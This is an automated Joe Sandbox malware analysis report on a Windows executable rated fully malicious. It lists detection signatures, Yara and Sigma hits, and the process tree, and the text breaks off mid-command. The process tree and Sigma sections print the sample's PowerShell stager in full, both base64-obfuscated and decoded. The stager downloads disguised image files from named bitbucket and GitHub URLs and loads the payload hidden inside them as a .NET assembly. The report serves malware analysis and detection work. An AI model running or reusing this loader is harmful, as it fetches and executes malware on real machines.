Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GdGXG0bnxH.exe

Overview

General Information

Sample name:GdGXG0bnxH.exe
renamed because original name is a hash value
Original sample name:8970eef61ba5b0d180b01242796bad53.exe
Analysis ID:1576152
MD5:8970eef61ba5b0d180b01242796bad53
SHA1:b321407f1f5ce589c99060e413e8edd676f4301c
SHA256:14fc6009715e1f4627e3fd9cefb81c27d55f766a210c651b6a0491b075f46189
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GdGXG0bnxH.exe (PID: 2404 cmdline: "C:\Users\user\Desktop\GdGXG0bnxH.exe" MD5: 8970EEF61BA5B0D180B01242796BAD53)
    • cmd.exe (PID: 7248 cmdline: cmd.exe /c 675c87f6bfee1.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$EM$bwBt$G0$YQBu$GQ$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$FM$dQBi$HM$d$By$Gk$bgBn$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Cw$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$QwBv$G4$dgBl$HI$d$Bd$Do$OgBG$HI$bwBt$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$Ck$Ow$g$C$$I$$k$HQ$ZQB4$HQ$I$$9$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$Ow$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBS$GU$ZgBs$GU$YwB0$Gk$bwBu$C4$QQBz$HM$ZQBt$GI$b$B5$F0$Og$6$Ew$bwBh$GQ$K$$k$GM$bwBt$G0$YQBu$GQ$QgB5$HQ$ZQBz$Ck$Ow$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$c$By$GU$cwBz$GU$Z$BC$Hk$d$Bl$EE$cgBy$GE$eQ$g$D0$I$BH$GU$d$$t$EM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$t$GI$eQB0$GU$QQBy$HI$YQB5$C$$J$Bl$G4$YwBU$GU$e$B0$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$EU$bgBj$G8$Z$Bl$GQ$V$Bl$Hg$d$$g$D0$WwBD$G8$bgB2$GU$cgB0$F0$Og$6$FQ$bwBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$G0$ZQB0$Gg$bwBk$C$$PQ$g$CQ$d$B5$H$$ZQ$u$Ec$ZQB0$E0$ZQB0$Gg$bwBk$Cg$JwBs$GY$cwBn$GU$Z$Bk$GQ$Z$Bk$GQ$Z$Bh$Cc$KQ$u$Ek$bgB2$G8$awBl$Cg$J$Bu$HU$b$Bs$Cw$I$Bb$G8$YgBq$GU$YwB0$Fs$XQBd$C$$K$$n$C$$d$B4$HQ$LgBJ$Gs$SQBo$GM$ZwBh$C8$cwBk$GE$bwBs$G4$dwBv$GQ$LwBz$GY$dwBx$GU$cQB3$C8$d$B3$HE$ZQB3$HE$ZQ$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $sodigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7412JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7412INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xbd62f:$b2: ::FromBase64String(
    • 0x1202d8:$b2: ::FromBase64String(
    • 0xbd402:$b3: ::UTF8.GetString(
    • 0x1200ab:$b3: ::UTF8.GetString(
    • 0xf4c8:$s1: -join
    • 0x5e916:$s1: -join
    • 0x70b3e:$s3: reverse
    • 0x77793:$s3: reverse
    • 0x7977a:$s3: reverse
    • 0x847a9:$s3: reverse
    • 0x8f6ee:$s3: reverse
    • 0x8f9dc:$s3: reverse
    • 0x900f6:$s3: reverse
    • 0x908af:$s3: reverse
    • 0x9799a:$s3: reverse
    • 0x97db4:$s3: reverse
    • 0x9893c:$s3: reverse
    • 0x995e9:$s3: reverse
    • 0xd48df:$s3: reverse
    • 0xddf41:$s3: reverse
    • 0x169b7e:$s3: reverse
    Process Memory Space: powershell.exe PID: 7548JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xee61:$b2: ::FromBase64String(
      • 0x860d4:$b2: ::FromBase64String(
      • 0x86edd:$b2: ::FromBase64String(
      • 0xaf321:$b2: ::FromBase64String(
      • 0xb018b:$b2: ::FromBase64String(
      • 0xcad96:$b2: ::FromBase64String(
      • 0xe1627:$b2: ::FromBase64String(
      • 0xeb8bd:$b2: ::FromBase64String(
      • 0xec34:$b3: ::UTF8.GetString(
      • 0x85ea7:$b3: ::UTF8.GetString(
      • 0x86cb0:$b3: ::UTF8.GetString(
      • 0xaf0f4:$b3: ::UTF8.GetString(
      • 0xaff5e:$b3: ::UTF8.GetString(
      • 0xcab69:$b3: ::UTF8.GetString(
      • 0xe13fa:$b3: ::UTF8.GetString(
      • 0xeb690:$b3: ::UTF8.GetString(
      • 0x4a4fb:$s1: -join
      • 0x55f33:$s1: -join
      • 0xa8f37:$s1: -join
      • 0x7c87:$s3: Reverse
      • 0x8b65:$s3: Reverse

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7548.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Spreading

        barindex
        Sigma detected: Powershell download payload from hardcoded c2 list
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = 